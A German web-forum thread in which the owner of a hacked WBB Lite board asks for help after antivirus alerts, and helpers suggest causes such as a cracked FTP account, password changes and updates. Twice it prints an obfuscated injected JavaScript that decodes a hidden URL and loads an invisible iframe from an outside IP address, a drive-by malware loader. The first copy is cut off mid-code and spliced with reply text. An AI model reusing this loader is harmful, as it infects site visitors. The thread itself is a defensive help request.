Virenmeldung

Hallo zusammen

Ich hab ein Problem… Seit gut einer Woche berichten mir User meines FOrums immer wieder, das bei Aufrufen der Seite die Virenscanner schreien, dass das Forum bedroht ist… Angeblich durch diverse Vieren und auch Trojaner…
Bei einem User wird die komplette Seite geblockt angeblich wegen Pornographie

Da ich absolut keine AHnung habe, was da los ist und auch net weiß wie ich event. Viren entfernen kann, such ich nun hier dringend um hilfe

Gibt es jemand der sich das ganze mal anschauen kann? der prüfen kann obs sauber ist oder mir sagen kann wie ich was verändern muss, damits aufhört?
Lieben Dank im vorraus

Link zum Forum:
vivaverona.bplaced.net/wbblite/

in mindestens einer Datei ist die Verseuchung.
Die mal nen Ausschnitt:

<body><script> var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;} return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;} return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('traEntweder ist dein PC verseucht und fügt an .php / html Dateien automatisch Viren, (und) oder dein FTP Account wurde gecrackt. Daher solltest du dringend deine Passwörter ändern.
Und mal deine Dateien durchsuchen :wink:

<script> var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;} return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;} return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}} i.i.l.j();</script>

virustotal.com/analisis/1642 … 1277931602
wepawet.iseclab.org/view.php?has … 67&type=js
Schöner Exploit … !coffee
Nehm das raus…

gut
passwörter ändern ist das kleinere problem… auf meinem PC befinden sich keine viren, da ich täglich alles sauber halte… daher denk ich problem 2 wäre logisch, da ich beobachtet habe das sich wochenlang ein Gast darum getrieben hat und versucht hat überall zu posten

frage…
wie mach ich das mit den daten sauber machen…
das was du da gepostet hast, soll ich das rauslöschen??? sorry bin gänzlich anfänger, das board hat mir vor einem jahr jemand aufgebaut den ich aber im moment nicht erreichen kann

und noch eine frage

WO nehm ich das raus… weder im Header noch im index find ich die liste

ich habs zweimal gefunden… allerdings wirds im quelltext der seite immernoch angezeigt…bitte helft mir

ich suche immer noch dringend hilfe!! Die sache ist ernst und es wäre nett, wenn mir jemand helfen könnte… Die Jungs die hinter dem Ticker hocken sagten mir auch, ich soll mich hier melden…

Also bitte ich nochmals um dringende Hilfe

Danke

hi,

haste evtl. backups o.ä. gemacht?

wenn du als am suchen bist, ließe sich evtl. auch einfach die software neu aufspielen.

grundsätzlich müsste es aber in der header datei ausgegeben werden.
woher das zustande kommt, kA sry

es muss ja nicht direkt dort drin stehen, kann auch in irgendner anderen Datei stecken und wird
dann am ende beim ausführen der PHP datei dort generiert :wink:

ich schau mir das ganze mal genauer an, evtl. kann ich dir dann gezieltere Dateien/Infos nennen.

ciao

edit: ich sehe nichtsmehr derart im quellcode, evtl. einfach mal browsercache leeren und auch mal inner forensoftware, ich könnte mir vorstellen, dass ähnlich wie bei phpBB3 ein Cache verwendet wird, ich sehe z.Z. nichtsmehr

hi,

Leider hast du hier auf bplaced keine Log-Files.

Denn wenn du ein Backup neu aufspielst, ist es nur eine Frage der Zeit bis du erneut gehackt wirst, weil die Lücke ja nicht behoben ist.

Vielleicht schaust du mal ob es schon eine neue Version deiner Forensoftware gibt, oder ob du unsichere Plugins verwendest. Vielleicht wäre auch ein .htaccess Verzeichnisschutz des Backends oder das Passwort ändern von einem anderen PC aus eine Lösung.

MfG

ZT

hi,

man weiß aber auch nicht wie sicher das passwort war, etc.
die Forensoftware ansich (ich rede ja auch von der Forensoftware und keinen exotischen modifikationskram irgendwelcher Script Kiddies) sollte schon soweit sicher sein, WBB Lite verwenden eig relativ viele noch z.Z. und das auch problemlos :wink:

jedoch ist die aktuellste version glaube Version 2 von WBB Lite.

ciao

Gibt es keine ältere, unsichere Version von WBB Light? :astonished: